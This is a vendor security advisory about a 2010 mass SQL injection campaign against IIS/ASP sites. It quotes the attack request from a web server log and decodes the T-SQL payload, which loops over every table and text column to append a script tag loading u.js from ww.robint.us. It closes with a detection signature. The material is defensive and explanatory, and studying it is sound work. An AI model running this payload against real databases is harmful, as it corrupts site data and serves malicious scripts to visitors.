::: Welcome to DrayTek MyVigor Website - http://myvigor.draytek.com :::

Mass infection of IIS/ASP sites - ww.robint.us

D-SWAT

Sucrui.net has posted a report two days ago, it's about the lastest mass IIS/ASP infection. Actually, this type of attack is not a new one.

Part of report posted on Sucrui blog:

Original web request (payload truncated for readability):

2010-06-07 13:31:15 W3SVC1 webserver 192.168.1.10 GET /page.aspx utm_source=campaign&utm_medium=banner&utm_campaign=campaignid&utm_content=100x200';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C6152652040742076........6F523B2D2D%20eXEc(@s)-- 80 - 121.xx.xxx.xx HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - - www.website.com 200 0 0 32068 1685 0

When we pull this apart we have:

dEcLaRe @s vArChAr(8000)
set @s=0x6445634C6152652040742076........6F523B2D2D
eXEc(@s)--

So they're essentially setting up the varaible '@s' and executing it. Next we decode the variable '@s':

0xdEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+cAsT(0x3C736372697074207372633D687474703A2F2F77772E726F62696E742E75732F752E6A733E3C2F7363726970743E aS vArChAr(51)) where ['+@c+'] not like ''%robint%''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--

Now they're iterating through the sysobjects table to find out your actual table names and then iterating through those and appending the final encoded string.

cAsT(0x3C736372697074207372633D687474703A2F2F77772E726F62696E742E75732F752E6A733E3C2F7363726970743E

decoded:
0x< script src=hxxp://ww.robint.us/u.js >< /script >

There are over 100,000 sites still infected. Using "ww.robint.us/u.js" as keyword and search in Google, you'll get about 140,000 results, and most of these sites are infected.

Workarounds

  1.VigorPro defends against this threat for your network. The related AI signature is shown below.
    - 5425 Malicious robint.us DNS

  2.Please update to the latest signature version as KL_002_072_001, DT_001_178_000.

References:

http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html
http://isc.sans.edu/diary.html?storyid=8935
http://www.sophos.com/blogs/sophoslabs/?p=9941

The information from DrayTek Corp.

About DrayTek

DrayTek Corp., founded in 1997, is a global provider of comprehensive network security, remote access and VoIP solutions for residential/small office and Small and Medium Enterprises(SME) use. To meet the needs of customers for quality and cost-effectiveness, DrayTek, with technologies integrated with real-time Anti-Virus/Anti-Intrusion system, VPN, VoIP and xDSL broadband access, has successfully delivered total network protection worldwide. For more information, please visit the company's website at http://www.draytek.com.

Press Contact:
DrayTek Marketing Dept.
press@draytek.com